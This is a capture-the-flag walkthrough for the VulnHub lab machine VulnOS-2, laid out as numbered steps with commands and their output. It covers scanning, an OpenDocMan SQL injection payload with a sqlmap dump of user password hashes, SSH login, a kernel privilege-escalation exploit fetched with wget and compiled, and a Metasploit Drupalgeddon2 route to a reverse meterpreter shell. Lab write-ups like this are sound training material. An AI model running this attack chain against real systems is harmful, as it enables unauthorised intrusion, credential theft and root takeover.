CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


01/12/2024 Shad Hussain Knowledge Views 291 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - VulnOs-2 - VulnHub

Machine Link : https://www.vulnhub.com/entry/vulnos-2,147/ STEP1 arp-scan -l -- to get the victim ip FINDING 192.168.0.102 ------------------------------------------------------------------------------------------------------------- STEP2 nmap -T4 -sSV -p- 192.168.0.102 -Pn -A FINDING 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 6667/tcp open irc ngircd OS details: Linux 3.2 - 4.9 ------------------------------------------------------------------------------------------------------------- STEP3 open the site on browser with ip and click on "website" in red at bottom ------------------------------------------------------------------------------------------------------------- STEP4 feroxbuster -u http://192.168.0.104/jabc/ FINDING 192.168.0.104/jabc/modules/blog/blog.info version = "7.26" project = "drupal" http://192.168.0.104/jabc/modules/node/node.test (xxs popup) ------------------------------------------------------------------------------------------------------------- STEP5 click on Document tab and go to the sourse FINDING /jabcd0cs/ at line 142 ------------------------------------------------------------------------------------------------------------- STEP6 dirb http://192.168.0.104/jabcd0cs/ http://192.168.0.104/jabcd0cs/ -- it is a login page NOTE -- at the bottom of the page search exploit for "OpenDocMan v1.2.7" FINDING https://www.exploit-db.com/exploits/32075 http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 -- sqlcommand injection vulnerability found in the exploit sqlmap -u http://192.168.0.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user --batch --dbms=mysql --dbs -p add_value -dump FINDING +----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+ | id | Email | phone | password | username | last_name | department | first_name | pw_reset_code | +----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+ | 1 | [email protected] | 5555551212 | b78aae356709f8c31118ea613980954b | webmin | min | 2 | web | blank | | 2 | [email protected] | 555 5555555 | 084e0343a0486ff05530df6c705c8bb4 (guest) | guest | guest | 2 | guest | NULL | | 3 | [email protected] | 9999999999 | b438079e6d6db31c2aad9fdf1032e756 | C | A | 1 | B | NULL | | 4 | [email protected] | 9999999999 | 3b253eadc522d0a2294eb492aba9b28c | U | L | 2 | F | NULL | | 5 | [email protected] | 123 4567890 | 64cc3db263af674b6b01fae1fc30bc7b | USERNAME | LAST | 2 | FIRST | NULL | +----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+ webmin-webmin1980 (password) guest -guest (password) ------------------------------------------------------------------------------------------------------------- STEP6 ssh [email protected] -p 22 -- with password webmin1980 ------------------------------------------------------------------------------------------------------------- STEP7 python -c import pty; pty.spawn("/bin/bash") ------------------------------------------------------------------------------------------------------------- STEP8 uname r FINDING 3.13.0-24-generic ------------------------------------------------------------------------------------------------------------- STEP9 search kernel exploit 3.13.0-24-generic FINDING https://www.exploit-db.com/exploits/37292 ------------------------------------------------------------------------------------------------------------- STEP10 on terminal cd /tmp wget https://www.exploit-db.com/download/37292 ls webmin@VulnOSv2:/tmp$ cp 37292 37292.c webmin@VulnOSv2:/tmp$ gcc 37292.c -o exploitt.c -pthread webmin@VulnOSv2:/tmp$ ./exploitt.c whoami you will be root # cd /root # ls flag.txt cat flag.txt Hello and welcome. You successfully compromised the company "JABC" and the server completely !! Congratulations !!! Hope you enjoyed it. What do you think of A.I.? =============WITH MSFCONSOLE=============================== STEP5 service postgresql start && msfconsole -- open msfconsole msf6 search exploit drupal msf6 use 1 [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf6 exploit(unix/webapp/drupal_drupalgeddon2) msf6 exploit(unix/webapp/drupal_drupalgeddon2) set rhosts 192.168.0.104 rhosts = 192.168.0.104 msf6 exploit(unix/webapp/drupal_drupalgeddon2) set targeturi /jabc/ targeturi = /jabc/ msf6 exploit(unix/webapp/drupal_drupalgeddon2) run ------------------------------------------------------------------------------------------------------------- STEP6 meterpreter shell ------------------------------------------------------------------------------------------------------------- STEP7 python -c import pty; pty.spawn("/bin/bash") ------------------------------------------------------------------------------------------------------------- STEP8 uname r FINDING 3.13.0-24-generic ------------------------------------------------------------------------------------------------------------- STEP9 search kernel exploit 3.13.0-24-generic FINDING https://www.exploit-db.com/exploits/37292 ------------------------------------------------------------------------------------------------------------- STEP10 on terminal cd /tmp wget https://www.exploit-db.com/download/37292 ls webmin@VulnOSv2:/tmp$ cp 37292 37292.c webmin@VulnOSv2:/tmp$ gcc 37292.c -o exploitt.c -pthread webmin@VulnOSv2:/tmp$ ./exploitt.c whoami you will be root # cd /root # ls flag.txt cat flag.txt Hello and welcome. You successfully compromised the company "JABC" and the server completely !! Congratulations !!! Hope you enjoyed it. What do you think of A.I.? -------------------------------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved